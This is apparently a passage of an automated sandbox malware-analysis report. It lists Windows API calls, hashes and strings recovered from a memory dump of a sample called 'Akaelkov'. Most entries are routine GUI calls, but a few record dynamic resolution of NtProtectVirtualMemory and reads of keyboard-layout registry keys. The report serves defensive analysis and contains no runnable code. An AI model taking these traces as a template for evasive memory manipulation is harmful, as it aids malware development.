                                                                                                    • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 040C0816
                                                                                                    • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 040C0883
                                                                                                    • GetActiveWindow.USER32 ref: 040C0892
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                    • String ID:
                                                                                                    • API String ID: 862346643-0
                                                                                                    • Opcode ID: 9280deb75a94a71007e0374cce08badd7497ca604d27a65e24cb268942d9f255
                                                                                                    • Instruction ID: e600f639a996b32a9611fbf7d0b3147bbb0bb20af1367e8a1a637ca828d9c0ec
                                                                                                    • Opcode Fuzzy Hash: 9280deb75a94a71007e0374cce08badd7497ca604d27a65e24cb268942d9f255
                                                                                                    • Instruction Fuzzy Hash: 77514630A00244EFEB01EFA9C985BAD7BF5EF45748F1580A8E440BB261D779BE80DB45
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SaveDC.GDI32(?), ref: 040AFD79
                                                                                                    • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 040AFDB2
                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 040AFDC6
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 040AFDE7
                                                                                                    • SetRect.USER32(?,00000000,00000000,?,?), ref: 040AFE17
                                                                                                    • DrawEdge.USER32(?,?,00000000,00000000), ref: 040AFE26
                                                                                                    • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 040AFE4F
                                                                                                    • RestoreDC.GDI32(?,?), ref: 040AFECE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$ClipIntersectLongWindow$DrawEdgeRestoreSave
                                                                                                    • String ID:
                                                                                                    • API String ID: 4023346126-0
                                                                                                    • Opcode ID: 1b597636fa919eb4861acb62e39998816952a479e217e6c919839162b512c386
                                                                                                    • Instruction ID: c7f8b3a8ad3e6ef4eed4b0cc08b753787963851ca3bf84ed01408584ab864139
                                                                                                    • Opcode Fuzzy Hash: 1b597636fa919eb4861acb62e39998816952a479e217e6c919839162b512c386
                                                                                                    • Instruction Fuzzy Hash: DF41F875E00209AFEB10EAE8C980FDEB7F9EB48318F1041A0E600BB291C675BE41CB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,040B38EC), ref: 040B37ED
                                                                                                    • GetTickCount.KERNEL32 ref: 040B37F2
                                                                                                    • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 040B3836
                                                                                                    • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 040B384E
                                                                                                    • AnimateWindow.USER32(00000000,00000064,?), ref: 040B3893
                                                                                                    • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,040B38EC), ref: 040B38B6
                                                                                                      • Part of subcall function 040B6EC8: GetCursorPos.USER32(?), ref: 040B6ECC
                                                                                                    • GetTickCount.KERNEL32 ref: 040B38D3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3024527889-0
                                                                                                    • Opcode ID: 90164ac57ddd3e3adb311bec24999e4594cb00f15e621f38266d4a807f125397
                                                                                                    • Instruction ID: 2283d972ad1b5ab942452be2ac833f36a8bdb341c6d538ba6c20c52ccb0c5080
                                                                                                    • Opcode Fuzzy Hash: 90164ac57ddd3e3adb311bec24999e4594cb00f15e621f38266d4a807f125397
                                                                                                    • Instruction Fuzzy Hash: 4B512774A00205EFEB10DFA8C984AEEB7F5EF45308F2046A4E980FB250D671BE45DB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 040C54A8: GetActiveWindow.USER32 ref: 040C54CF
                                                                                                      • Part of subcall function 040C54A8: GetLastActivePopup.USER32(?), ref: 040C54E1
                                                                                                    • GetWindowRect.USER32(?,?), ref: 040C417E
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 040C41B6
                                                                                                    • MessageBoxA.USER32(00000000,?,?,?), ref: 040C41F5
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,040C426B,?,00000000,040C4264), ref: 040C4245
                                                                                                    • SetActiveWindow.USER32(00000000,040C426B,?,00000000,040C4264), ref: 040C4256
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Active$LastMessagePopupRect
                                                                                                    • String ID: (
                                                                                                    • API String ID: 3456420849-3887548279
                                                                                                    • Opcode ID: ca61d957c40e1b8da1e279039c47bf56c8050803f4930def2033819e157e59aa
                                                                                                    • Instruction ID: 6c6819d352e75ae94f7228955146ccf9e9614f3f400e09b62dffd112ac87cc19
                                                                                                    • Opcode Fuzzy Hash: ca61d957c40e1b8da1e279039c47bf56c8050803f4930def2033819e157e59aa
                                                                                                    • Instruction Fuzzy Hash: 3F51D475A00218EFEB04DBA8CD91FAEB7F9FB88304F548469E900EB291D674BD008B54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SelectObject.GDI32(?,?), ref: 040935E2
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 040935F1
                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0409361D
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0409362B
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 04093639
                                                                                                    • DeleteDC.GDI32(?), ref: 0409364F
                                                                                                    • DeleteDC.GDI32(?), ref: 04093658
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectSelect$Delete$Stretch
                                                                                                    • String ID:
                                                                                                    • API String ID: 1458357782-0
                                                                                                    • Opcode ID: 285ee4c0b46929405e6ea6dda1ceafcda106b39ae8404a62d1e5820fd88a3e75
                                                                                                    • Instruction ID: 45853a6605ed73ffc0d55e32eeabe4eaf21593aa5df8f96b9648d3a3fb39531f
                                                                                                    • Opcode Fuzzy Hash: 285ee4c0b46929405e6ea6dda1ceafcda106b39ae8404a62d1e5820fd88a3e75
                                                                                                    • Instruction Fuzzy Hash: 7041FA71E10649AFEF50EBE8C845FAEB7F8EB0C718F014811BA15FB240D675AD049B65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetDesktopWindow.USER32 ref: 040AB12B
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 040AB161
                                                                                                    • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 040AB187
                                                                                                    • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 040AB1A9
                                                                                                    • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 040AB1C8
                                                                                                    • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 040AB1E2
                                                                                                    • SelectObject.GDI32(?,?), ref: 040AB1EF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectSelect$DesktopWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2666862715-0
                                                                                                    • Opcode ID: ecb3496304ba5597a2ecb0794a8e3d737f192dc5c9fd938a3cd44fec7afef13e
                                                                                                    • Instruction ID: 4a80cc65b0eb73cfb146a8fa9289f033c0278ed6e1329945e56774ca7e9694a6
                                                                                                    • Opcode Fuzzy Hash: ecb3496304ba5597a2ecb0794a8e3d737f192dc5c9fd938a3cd44fec7afef13e
                                                                                                    • Instruction Fuzzy Hash: C3310BB2E006196FDB00DEECCC89DEFBBBCBF09618B414465B504F7244C676AD048BA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • EnumDisplayMonitors.USER32(?,?,?,?), ref: 0409B285
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 0409B2AA
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 0409B2B5
                                                                                                    • IntersectRect.USER32(?,?,?), ref: 0409B2FE
                                                                                                    • IntersectRect.USER32(?,?,?), ref: 0409B314
                                                                                                      • Part of subcall function 0409ACA4: GetProcAddress.KERNEL32(0410A568,00000000), ref: 0409AD23
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IntersectMetricsRectSystem$AddressDisplayEnumMonitorsProc
                                                                                                    • String ID: EnumDisplayMonitors
                                                                                                    • API String ID: 2238260564-2491903729
                                                                                                    • Opcode ID: 7f55bd3abb56d7e02bdcc7303526009d8f0069846ce7f8bd5cf6b1de76fc8d3e
                                                                                                    • Instruction ID: 4d674e8b66319f4a301c815ce489de9e23ad03bae42426292373af9f4b8aec22
                                                                                                    • Opcode Fuzzy Hash: 7f55bd3abb56d7e02bdcc7303526009d8f0069846ce7f8bd5cf6b1de76fc8d3e
                                                                                                    • Instruction Fuzzy Hash: 32311972E04209AFDF50DEA5E884AEF77FCFF49264F048126E915E3200E674F9449BA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 040BD161
                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 040BD173
                                                                                                    • GetClassLongA.USER32(00000000,000000E6), ref: 040BD186
                                                                                                    • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 040BD1C6
                                                                                                    • SetWindowLongA.USER32(00000000,000000EC,?), ref: 040BD1DA
                                                                                                    • SetClassLongA.USER32(00000000,000000E6,?), ref: 040BD1EE
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000233,00000000,000000E6,?,00000000,000000EC,?,00000000,000000F0,00000000), ref: 040BD20A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Long$Window$Class
                                                                                                    • String ID:
                                                                                                    • API String ID: 2026531576-0
                                                                                                    • Opcode ID: a955475e008342a39e440602636dbc793ab62fdf25f557567a4f0dff511511b1
                                                                                                    • Instruction ID: f0feaacd072e931d16b533c927c87adbebe1e85fdeb300d1f81f9e9829fe0be6
                                                                                                    • Opcode Fuzzy Hash: a955475e008342a39e440602636dbc793ab62fdf25f557567a4f0dff511511b1
                                                                                                    • Instruction Fuzzy Hash: 90215270A0824276EA01A77C8C54AFEB6995F8125CF084A54B4E4BB3D0CB74F845D7DA
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0409B0FC
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 0409B111
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 0409B11C
                                                                                                    • lstrcpy.KERNEL32(?,DISPLAY), ref: 0409B146
                                                                                                      • Part of subcall function 0409ACA4: GetProcAddress.KERNEL32(0410A568,00000000), ref: 0409AD23
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                                    • String ID: DISPLAY$GetMonitorInfoA
                                                                                                    • API String ID: 2545840971-1370492664
                                                                                                    • Opcode ID: e25340849241a9d55ad3be11c093fb5f4d349a493b29ae19e049d9015dcb19a9
                                                                                                    • Instruction ID: a213f1a823e3549079723293637211d9aebff32e1bfbb8c437cd5b390194fdf5
                                                                                                    • Opcode Fuzzy Hash: e25340849241a9d55ad3be11c093fb5f4d349a493b29ae19e049d9015dcb19a9
                                                                                                    • Instruction Fuzzy Hash: A511EE316003049FEB20CF65AC84BA7B7F9FF857A4F404929E855EB250D6B4BC849BA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0409B1D0
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 0409B1E5
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 0409B1F0
                                                                                                    • lstrcpy.KERNEL32(?,DISPLAY), ref: 0409B21A
                                                                                                      • Part of subcall function 0409ACA4: GetProcAddress.KERNEL32(0410A568,00000000), ref: 0409AD23
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                                    • String ID: DISPLAY$GetMonitorInfoW
                                                                                                    • API String ID: 2545840971-2774842281
                                                                                                    • Opcode ID: 9541ffe8c6f5934f064177b02d239282142b545af1f6b59afb9b16bc4ec861e2
                                                                                                    • Instruction ID: 3c1e78264fd294a5261de7da6a61d420fb8273394df39584ff639c2eab58b1f7
                                                                                                    • Opcode Fuzzy Hash: 9541ffe8c6f5934f064177b02d239282142b545af1f6b59afb9b16bc4ec861e2
                                                                                                    • Instruction Fuzzy Hash: CE11AF31A007005FEB24CE65A844BBBB7F8FF05765F004529ED55E7240D6B4BC84DBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,040746CF,?,?,?,00000002,0407477A,04072DAF,04072DF6), ref: 04074641
                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,040746CF,?,?,?,00000002,0407477A,04072DAF,04072DF6), ref: 04074647
                                                                                                    • GetStdHandle.KERNEL32(000000F5,04074690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,040746CF), ref: 0407465C
                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,04074690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,040746CF), ref: 04074662
                                                                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,040DA754,00000000), ref: 04074680
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileHandleWrite$Message
                                                                                                    • String ID: Runtime error at 00000000
                                                                                                    • API String ID: 1570097196-1393363852
                                                                                                    • Opcode ID: 494e74b0827591cca06c41cdcd3a375f19fb9a3ed94ee622459e21221ec9b14c
                                                                                                    • Instruction ID: 8b685dcab7c7540ff1a5ae6febed4f8ff6fad273b46469a6b78a7c465a94568f
                                                                                                    • Opcode Fuzzy Hash: 494e74b0827591cca06c41cdcd3a375f19fb9a3ed94ee622459e21221ec9b14c
                                                                                                    • Instruction Fuzzy Hash: 73F030B1F8538075FB20AA606C85FD927989745B2DF148719B720BC0C197E8B8D98F2B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0408D6EF
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0408D6FE
                                                                                                    • RtlEnterCriticalSection.NTDLL(0410A2EC), ref: 0408D743
                                                                                                    • InterlockedExchange.KERNEL32(040DAAF0,?), ref: 0408D75F
                                                                                                    • RtlLeaveCriticalSection.NTDLL(0410A2EC), ref: 0408D7B8
                                                                                                    • RtlEnterCriticalSection.NTDLL(0410A2EC), ref: 0408D827
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$CurrentEnterThread$ExchangeInterlockedLeave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1985336998-0
                                                                                                    • Opcode ID: 2157fb84626f23085ab54f4f298206602b42cd3ca00acadbfc6b9bce96fee5ee
                                                                                                    • Instruction ID: ace7a337e41b17dcdeb55c1f9236aa615d61eb5c4f133f164f74f95088353b51
                                                                                                    • Opcode Fuzzy Hash: 2157fb84626f23085ab54f4f298206602b42cd3ca00acadbfc6b9bce96fee5ee
                                                                                                    • Instruction Fuzzy Hash: C531E230B04744AFE701EBA4C950AA9B7E8EF09718F5189B8E841E7690E7797840CE26
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 040C1D79
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 040C1D86
                                                                                                    • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 040C1DC5
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 040C1DD5
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 040C1DEE
                                                                                                      • Part of subcall function 04092518: MulDiv.KERNEL32(00000000,?,00000048), ref: 04092525
                                                                                                    • GetStockObject.GDI32(0000000D), ref: 040C1E14
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFontIndirect$InfoParametersSystem$ObjectStock
                                                                                                    • String ID:
                                                                                                    • API String ID: 2473929816-0
                                                                                                    • Opcode ID: b08809faadd5dfff5acc140fbb44c5fb71523f1accf4a39510c0de072061d410
                                                                                                    • Instruction ID: 5d77d623d68b401a5bcf6420b62bb0c9b12a21f105013ce3c3a99c7a5b244bf6
                                                                                                    • Opcode Fuzzy Hash: b08809faadd5dfff5acc140fbb44c5fb71523f1accf4a39510c0de072061d410
                                                                                                    • Instruction Fuzzy Hash: DD31AF30A05604EBFB54EB64C841BD937F4EF44308F4484B4A948EB286DE75BC49CB26
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 040C6CA4
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 040C6CB5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
                                                                                                    • API String ID: 1646373207-3125200627
                                                                                                    • Opcode ID: f06882d9824c401dfe8034cfdd0bc5f9477a7ec27eee6b2781c77965e28042a9
                                                                                                    • Instruction ID: d4328a38df3a397cf85fbe5e37b62c2074667c524a7c7dbeb9bde6c6d7117830
                                                                                                    • Opcode Fuzzy Hash: f06882d9824c401dfe8034cfdd0bc5f9477a7ec27eee6b2781c77965e28042a9
                                                                                                    • Instruction Fuzzy Hash: 14214170B00740EBF720AF79DC55A6D37A9EB4575CB00482CA815F7650DAB7BC80DA12
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 040902A4: RegCloseKey.ADVAPI32(10940000,04090180,00000001,04090222,?,?,040976BA,00000008,0410A374,00000048,00000000,0409775F), ref: 040902B8
                                                                                                      • Part of subcall function 04090308: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,040904A2), ref: 04090374
                                                                                                      • Part of subcall function 0407DC04: SetErrorMode.KERNEL32 ref: 0407DC0E
                                                                                                      • Part of subcall function 0407DC04: LoadLibraryA.KERNEL32(00000000,00000000,0407DC58,?,00000000,0407DC76), ref: 0407DC3D
                                                                                                    • GetProcAddress.KERNEL32(?,KbdLayerDescriptor), ref: 040A30C1
                                                                                                    • FreeLibrary.KERNEL32(?,040A30FB,?,00000000,00000000,040A313B), ref: 040A30EE
                                                                                                    Strings
                                                                                                    • Layout File, xrefs: 040A308D
                                                                                                    • \SYSTEM\CurrentControlSet\Control\Keyboard Layouts\, xrefs: 040A3075
                                                                                                    • KbdLayerDescriptor, xrefs: 040A30B8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressCloseErrorFreeLoadModeOpenProc
                                                                                                    • String ID: KbdLayerDescriptor$Layout File$\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
                                                                                                    • API String ID: 3547551084-2194312379
                                                                                                    • Opcode ID: 53130c19bc368839eb21ae60212cb7a6c0c46de722727f8fddc8cff56c19e5b9
                                                                                                    • Instruction ID: aa041e439b52b82d1402e378a9fdf718ce0eaba7d654a4487d16db83b1345825
                                                                                                    • Opcode Fuzzy Hash: 53130c19bc368839eb21ae60212cb7a6c0c46de722727f8fddc8cff56c19e5b9
                                                                                                    • Instruction Fuzzy Hash: B0215E71E00249AFEF01EFE4C8519DEB7B6EB89708F518464E810B7600DB39B955CB65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • WindowFromPoint.USER32(?,?), ref: 040C1CB0
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 040C1CC5
                                                                                                    • SendMessageA.USER32(00000000,00000084,00000000,?), ref: 040C1CEE
                                                                                                    • SendMessageA.USER32(00000000,00000020,00000000,?), ref: 040C1D00
                                                                                                    • SetCursor.USER32(00000000), ref: 040C1D12
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CurrentCursorFromPointThreadWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188251016-0
                                                                                                    • Opcode ID: 0301ce3d54c7204a7a6b5ca268c7210a4c05c4d30679fed311c8ecdd25f56cd2
                                                                                                    • Instruction ID: df552f9b2504a46f07e9edcb53a08e924c8885b8193d04f3b04febf6b246881a
                                                                                                    • Opcode Fuzzy Hash: 0301ce3d54c7204a7a6b5ca268c7210a4c05c4d30679fed311c8ecdd25f56cd2
                                                                                                    • Instruction Fuzzy Hash: 6501D236604340B5E7202B648C80FBF3AA9DF85A9DF10445DFA84BF291E625F801972B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,0407BDD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0407BC2F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LocaleThread
                                                                                                    • String ID: eeee$ggg$yyyy
                                                                                                    • API String ID: 635194068-1253427255
                                                                                                    • Opcode ID: fafe85e1b10209e8de6501013a9e1333d54780c7252bdf55d882aca74e754ee2
                                                                                                    • Instruction ID: e98162ed0069d79dd036f65589300124ea191d829f079558304d48f9b425e51f
                                                                                                    • Opcode Fuzzy Hash: fafe85e1b10209e8de6501013a9e1333d54780c7252bdf55d882aca74e754ee2
                                                                                                    • Instruction Fuzzy Hash: 6B41DF60F141059BF751AA6988906FEB7FADB8120CB24C525D461FB344EA38FD068A2F
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 0408FC21
                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0408FC27
                                                                                                    Strings
                                                                                                    • NtProtectVirtualMemory, xrefs: 0408FC17
                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 0408FC1C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
                                                                                                    • API String ID: 1646373207-1386159242
                                                                                                    • Opcode ID: 758618e3320203c68c59291ac3ee4df96d92a460f382b4dda182b8766efec0bc
                                                                                                    • Instruction ID: d8ace7c989319699a1d33299b9cf78382b32ffaf4110374d416b2a14d6abcf9f
                                                                                                    • Opcode Fuzzy Hash: 758618e3320203c68c59291ac3ee4df96d92a460f382b4dda182b8766efec0bc
                                                                                                    • Instruction Fuzzy Hash: 42E0BF755003496F8B40EFA9DE85D8B37ECAB2C6647404404BA19DB201C675F9908F75
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,040D910B,00000000,040D911E), ref: 0407D6A6
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0407D6B7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                    • API String ID: 1646373207-3712701948
                                                                                                    • Opcode ID: 9c02093551bf3ff9bff981cabc33e5637cccf5a022bb205d5ead2f0cab047a80
                                                                                                    • Instruction ID: 762446933a0acce8f81aa32cee6dfd1d8cf1f74d143ed2877628e2ad8f1a7905
